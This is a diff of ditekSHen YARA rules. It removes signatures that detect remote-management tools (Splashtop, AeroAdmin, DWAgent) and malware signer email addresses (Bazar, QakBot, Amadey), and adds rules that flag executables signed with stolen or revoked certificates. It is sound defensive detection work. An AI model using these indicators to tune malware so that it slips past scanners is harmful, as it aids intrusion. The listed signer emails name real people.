-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L385-L403"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3711-L3722"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "67181cd6ae071074c6bf35f44963c11c9ee9b7df242027c15b1e165d108f7b98"
+		logic_hash = "a900017eb33db455b94e3474ce3a2f1ebf6416ff21477a464aba68d32fd7c938"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.SplashtopStreamer"
-
-	strings:
-		$s1 = "\\slave\\workspace\\GIT_WIN_SRS_Formal\\Source\\irisserver\\" ascii
-		$s2 = ".api.splashtop.com" wide
-		$s3 = "Software\\Splashtop Inc.\\Splashtop" wide
-		$s4 = "restarted the streamer.%nApp version: %1" wide
-		$s5 = "Splashtop-Splashtop Streamer-" wide
-		$s6 = "[RemoveStreamer] Send msg 2 cloud(%d:%d:%d)" wide
+		thumbprint = "63938d34572837514929fa7ae3cfebedf6d2cb65"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BAKERA s.r.o." and pe.signatures [ i ] . serial == "45:eb:91:87:a2:50:5d:8e:6c:84:2e:6d:36:6a:d0:c8" )
 }
 
-rule DITEKSHEN_INDICATOR_RMM_Splashtopstreamer_CERT : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Cbc2Af7D82295A8535F3B26B47522640 : FILE
 {
 	meta:
-		description = "Detects Splashtop Streamer by certificate. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7e0e4d6f-38a3-5cac-8a82-8aea7943d373"
-		date = "2023-08-22"
+		id = "d4f422a7-2b1c-5db0-ad9b-1eb8b3a75e3c"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L405-L419"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3724-L3735"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0a1225a79ff30678846b9cb4315419be04b46276b3e05310a21d088b30f01b72"
+		logic_hash = "6d9fb9b36bc4370851fd0f54bb9fb05e02fc7a6288355b57073c31b1feade41e"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "08d2c03d0959905b4b04caee1202b8ed748a8bd0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Splashtop Inc." )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eabfdafffefaccaedaec" and pe.signatures [ i ] . serial == "cb:c2:af:7d:82:29:5a:85:35:f3:b2:6b:47:52:26:40" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Aeroadmin : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ca1D9391Cf5Fe3E696831D98D6C35A6 : FILE
 {
 	meta:
-		description = "Detects AeroAdmin. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0f69c6da-40e4-5952-b6f9-ed401279eb9e"
-		date = "2023-08-22"
+		id = "e2f026d6-031d-5058-a7f1-fc492ea47908"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L421-L442"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3737-L3748"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a0a9e15f31b6b06fbc749b863563c30351c775c1b1d17952013670e7e1d68c41"
+		logic_hash = "4c60dea4fe28c2799dc88712275e62a795c848120c4b463109942b8d9bc29a81"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.AeroAdmin"
-
-	strings:
-		$s1 = "\\AeroAdmin" wide
-		$s2 = ".aeroadmin.com" ascii wide
-		$s3 = "XAeroadminAppRestarter" wide
-		$s4 = "SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network\\AeroadminService" wide
-		$s5 = "AeroAdmin {}" ascii
-		$s6 = "FAeroAdmin.cpp" fullword ascii
-		$s7 = "Referer: http://900100.net" ascii
-		$s8 = "POST /sims/sims_new.php" ascii
-		$s9 = "aeroadmin.pdb" ascii
+		thumbprint = "0689776ca5ca0ca9641329dc29efdb61302d7378"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "www.norton.com" and pe.signatures [ i ] . serial == "0c:a1:d9:39:1c:f5:fe:3e:69:68:31:d9:8d:6c:35:a6" )
 }
 
-rule DITEKSHEN_INDICATOR_RMM_Aeroadmin_CERT : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_43A36A26Ebc78E111A874D8211A95E3F : FILE
 {
 	meta:
-		description = "Detects AeroAdmin by certificate. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ca34fd3c-eb76-57e3-8b62-ab0d0c9ec7b3"
-		date = "2023-08-22"
+		id = "651ca649-c707-59d2-b482-5ca6d1e569b0"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L444-L461"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3750-L3761"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1fe2d2bb6a8afd25fc5ee7a60fe5a931484591bafab24c5d488c7f0483e248a"
+		logic_hash = "2588c91e1cce7e595e4237843b03f3e65427b4c3ea634e9a4f8249e9c9f49dbe"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.AeroAdmin"
+		thumbprint = "a346bda33b5b3bea04b299fe87c165c4f221645a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "GlobalSign" and ( pe.signatures [ i ] . subject contains "Aeroadmin LLC" or pe.signatures [ i ] . subject contains "@aeroadmin.com" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Efacefcafeabbdcbcea" and pe.signatures [ i ] . serial == "43:a3:6a:26:eb:c7:8e:11:1a:87:4d:82:11:a9:5e:3f" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Dwagentlib : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5172Caa2119185382343Fcbe09C43Bee : FILE
 {
 	meta:
-		description = "Detect DWAgent Remote Administration Tool library"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "af0f9940-fbec-5775-9b74-bd73b55ec0ca"
-		date = "2023-08-22"
+		id = "54f38317-2d36-54ec-a3fc-04f8b0fc5529"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L463-L482"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3763-L3774"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "608dd9bc8cfcec5a671bee9456dccedace31d7ae37180387ac2408f79fd9f452"
+		logic_hash = "7aa1447bd0ac43ac29ed69bd6618c3695bfb50517a7ffce7d4e793ae0c5e0fa6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.DWAgent-LIB"
-
-	strings:
-		$s1 = "DWAgentLib" fullword wide
-		$s2 = "PYTHONHOME" fullword wide
-		$s3 = "isTaskRunning" fullword ascii
-		$s4 = "isUserInAdminGroup" fullword ascii
-		$s5 = "setFilePermissionEveryone" fullword ascii
-		$s6 = "startProcessInActiveConsole" fullword ascii
-		$s7 = "taskKill" fullword ascii
+		thumbprint = "fd9b3f6b0eb9bd9baf7cbdc79ae7979b7ddad770"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aefcdac" and pe.signatures [ i ] . serial == "51:72:ca:a2:11:91:85:38:23:43:fc:be:09:c4:3b:ee" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Dwagentsvc : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_009245D1511923F541844Faa3C6Bfebcbe : FILE
 {
 	meta:
-		description = "Detect DWAgent Remote Administration Tool service"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5d124c20-a0f8-5e82-8bab-93a782a2a649"
-		date = "2023-08-22"
+		id = "db876459-a0d2-542f-8f7e-a486ba68aeb4"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L484-L501"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3776-L3787"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "590d41d2e433a7a1bb373fbd0b0d47818a9867bee0399101881b05e83b586f6e"
+		logic_hash = "8d2c186b3aaaf353857e67ffd51a785e674335e824be78fc1c2ae1b9a0532eae"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.DWAgent-SVC"
-
-	strings:
-		$s1 = "\\native\\dwagupd.dll" wide
-		$s2 = "\\native\\dwagsvc.exe\" run" wide
-		$s3 = "CreateServiceW" fullword ascii
-		$s4 = /dwagent\.(pid|start|stop)/ wide
-		$s5 = "Check updating..." wide
+		thumbprint = "509cbd2cd38ae03461745c7d37f6bbe44c6782cf"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEHTEH d.o.o.," and pe.signatures [ i ] . serial == "00:92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Dwagent_Screencapture : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E161F76Da3B5E4623892C8E6Fda1Ea3D : FILE
 {
 	meta:
-		description = "Detect DWAgent Remote Administration Tool Screen Capture Module"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "79586e5e-b7e5-5adc-97f3-0d29ad695079"
-		date = "2023-08-22"
+		id = "a010cf24-b29a-5613-8122-92ced507564f"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L503-L528"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3789-L3800"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d3160fd4cce445aa6d2bc6c083893c7610ea5e72824fe9824ad853700f4d3874"
+		logic_hash = "7aae91e2873633989b3716930354361ee56d7fd7af35e105ae15ed6bf87de67a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.DWAgent-ScreenCapture"
-
-	strings:
-		$s1 = "DWAgentLib" fullword wide
-		$s2 = "PYTHONHOME" wide
-		$s3 = "VirtualBox" wide
-		$s4 = "VMware" wide
-		$s5 = "ScreenCapture::prepareCursor#" ascii
-		$s6 = "ScreenCapture::getMonitorCount#" ascii
-		$s7 = "ScreenCapture::token" ascii
-		$s8 = "dwascreencapture" ascii
-		$s9 = "inputKeyboard CTRLALTCANC" ascii
-		$s10 = "_Z34ScreenCaptureNativeMonitorEnumProc" ascii
-		$s11 = "_Z41ScreenCaptureNativeCreateWindowThreadProc" ascii
-		$s12 = "_ZN13ScreenCapture" ascii
-		$s13 = "isUserInAdminGroup" ascii
+		thumbprint = "df5fbfbfd47875b580b150603de240ead9c7ad27"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TGN Nedelica d.o.o." and pe.signatures [ i ] . serial == "00:e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Dwagent_Soundcapture : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_009Faf8705A3Eaef9340800Cc4Fd38597C : FILE
 {
 	meta:
-		description = "Detect DWAgent Remote Administration Tool Sound Capture Module"
-		author = "ditekSHen"
-		id = "4e395d1e-96a1-5ecc-abe5-6f8323a2c8ca"
-		date = "2023-08-22"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "5b85e806-6b13-5356-a225-23399b947114"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L530-L545"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3802-L3813"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c0efa9f383373dec1c5b9d127c2b4c6f4906718ae8f62eea28d7a369001be5af"
+		logic_hash = "41c6561ef50950c7a5b4107b788e0469f77b9905b777edb24501649e4c313bd6"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.DWAgent-SoundCapture"
-
-	strings:
-		$s1 = "DWASoundCapture" ascii
-		$s2 = /_Z\d{2}DWASoundCapture/ ascii
-		$s3 = "_Z6recordPvS_" ascii
+		thumbprint = "40c572cc19e7ca4c2fb89c96357eff4c7489958e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tekhnokod LLC" and pe.signatures [ i ] . serial == "00:9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" )
 }
 
-rule DITEKSHEN_INDICATOR_RMM_Dwagent_CERT : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : FILE
 {
 	meta:
-		description = "Detects DWAgent by certificate. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "96572e83-ffb9-58d9-93d1-84e16ae1a3ba"
-		date = "2023-08-22"
+		id = "4c3153e4-d3ce-5e87-8e72-969cba972e26"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L547-L563"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3815-L3826"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ed86f053c8d1423aae8cfc6e0bba6021510dfb6d722430c8c7edb15d3e8233a"
+		logic_hash = "5e0d1b74422ae1004b0054c161d1dc949bb368ac17575e33c9b6d550bb136126"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4a13f46def2c9427898a46a88a6a2122ed106b37"
+		thumbprint = "eb5f5ab7294ba39f2b77085f47382bd7e759ff3a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DWSNET srl" and pe.signatures [ i ] . issuer contains "Sectigo Public Code Signing CA R36" and pe.signatures [ i ] . serial == "00:af:bd:d3:be:b2:4e:1d:e7:37:82:e9:f8:34:7c:f1:53" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lotte Schmidt" and pe.signatures [ i ] . serial == "28:88:cf:0f:95:3a:4a:36:40:ee:4c:fc:63:04:d9:d4" )
 }
-rule DITEKSHEN_INDICATOR_OSX_RMM_Dwagent : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C8Edcfe8Be174C2F204D858C5B91Dea5 : FILE
 {
 	meta:
-		description = "Detect DWAgent Remote Administration Tool macOS run"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0eeb9ae3-826e-52b7-bbb8-3f8c4920f5c3"
-		date = "2023-08-22"
+		id = "196da268-b9a3-562c-ad68-67d17ea94ccf"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L565-L580"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3828-L3839"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9864668abdd534d8a33940f9513d07356451ce1eaa9233771e82b8138dc0b41b"
+		logic_hash = "56801a71547218413ab48381c412a8e1b7fd41a9f7a7c85dc6debdc38a19d6c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Osx.RMM.DWAgent-RUN"
-
-	strings:
-		$s1 = "net.dwservice.DWAgent" ascii
-		$s2 = "-[DWADelegate" ascii
-		$s3 = "customWindowsToEnterFullScreenForWindow:onScreen:" ascii
+		thumbprint = "7f5f205094940793d1028960e0f0e8b654f9956e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfeca and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Paarcopy Oy" and pe.signatures [ i ] . serial == "00:c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Bazarloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1A311630876F694Fe1B75D972A953Bca : FILE
 {
 	meta:
-		description = "Detects Bazar executables with specific email addresses found in the code signing certificate"
-		author = "ditekShen"
-		id = "94b814e3-56c2-5cdb-9335-c92eea8ec668"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "2a39397f-1585-5f7f-a2a9-aab62d29a2b2"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L11-L21"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3841-L3852"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fd47a1d996c78a6efc144f0fe0a28951c34becab3101e7d25acc980bb6b9f8ce"
+		logic_hash = "f14532caf49e6f46f75e42e334d3170db0ebebfe75c9f3e057c237691b5d86a2"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "skarabeyllc@gmail.com" ascii wide nocase
-		$s2 = "admin@intell-it.ru" ascii wide nocase
-		$s3 = "support@pro-kon.ru" ascii wide
+		thumbprint = "d473ec0fe212b7847f1a4ee06eff64e2a3b4001e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GTEC s.r.o." and pe.signatures [ i ] . serial == "1a:31:16:30:87:6f:69:4f:e1:b7:5d:97:2a:95:3b:ca" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Qakbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00A496Bc774575C31Abec861B68C36Dcb6 : FILE
 {
 	meta:
-		description = "Detects QakBot executables with specific email addresses found in the code signing certificate"
-		author = "ditekShen"
-		id = "24ad36b2-5022-5f72-b01c-fbb64da20f34"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "2415bf62-15d4-562a-a448-682474d89af0"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L23-L37"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3854-L3865"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7a38069b3b553cba1a789dac706638382dae5bb748b0c10ef50138879767b6dd"
+		logic_hash = "bf5282687f4707bc16d388361ddc0af1102df0d29066ece0b57215fcf9fdcc94"
 		score = 75
-		quality = 61
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "hutter.s94@yahoo.com" ascii wide nocase
-		$s2 = "andrej.vrear@aol.com" ascii wide nocase
-		$s3 = "klaus.pedersen@aol.com" ascii wide nocase
-		$s4 = "a.spendl@aol.com" ascii wide nocase
-		$s5 = "mjemec@aol.com" ascii wide nocase
-		$s6 = "robert.sijanec@yahoo.com" ascii wide nocase
-		$s7 = "mitja.vidovi@aol.com" ascii wide nocase
+		thumbprint = "b2c70d30c0b34bfeffb8a9cb343e5cad5f6bcbf7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGLE DVORSAK, d.o.o" and pe.signatures [ i ] . serial == "00:a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Amadey : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ea720222D92Dc8D48E3B3C3B0Fc360A6 : FILE
 {
 	meta:
-		description = "Detects Amadey executables with specific email addresses found in the code signing certificate"
-		author = "ditekShen"
-		id = "f9abbf1d-2077-52a8-bfb0-df3732649624"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "2e43e98a-61f8-5f93-a415-52cb6453620d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L39-L47"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3867-L3878"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3df3fe67835f76e51743b1b4fa2cbc48277d82689c2fc27457b4d7d820e56e43"
+		logic_hash = "97b2699d4cb0fd88e3440ea82dd6ea87cdac69c6ba2acd884f5aef577b55e79d"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "tochka.director@gmail.com" ascii wide nocase
+		thumbprint = "522d0f1ca87ef784994dfd63cb0919722dfdb79f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAVANAGH NETS LIMITED" and pe.signatures [ i ] . serial == "00:ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_UNK01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_333Ca7D100B139B0D9C1A97Cb458E226 : FILE
 {
 	meta:
-		description = "Detects Amadey executables with specific email addresses found in the code signing certificate"
-		author = "ditekShen"
-		id = "56e83bfb-e17d-5d27-87fa-e275cc540148"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "dd5b3eb8-81c0-570d-9ec8-6a55eb7864f9"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L49-L58"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3880-L3891"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d85461f74186fcabcbf7f2bc1dce06b0012c504cf3235a6fc3e1499dc6f8a3ee"
+		logic_hash = "4519127b975d93297cca9b465ad88b3d38ad0fce0de182246dca3f000e2438be"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "37d08a64868c35c5bae8f5155cc669486590951ea80dd9da61ec38defb89a146"
-
-	strings:
-		$s1 = "etienne@tetracerous.br" ascii wide nocase
+		thumbprint = "d618cf7ef3a674ff1ea50800b4d965de0ff463cb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSE, d.o.o." and pe.signatures [ i ] . serial == "33:3c:a7:d1:00:b1:39:b0:d9:c1:a9:7c:b4:58:e2:26" )
 }
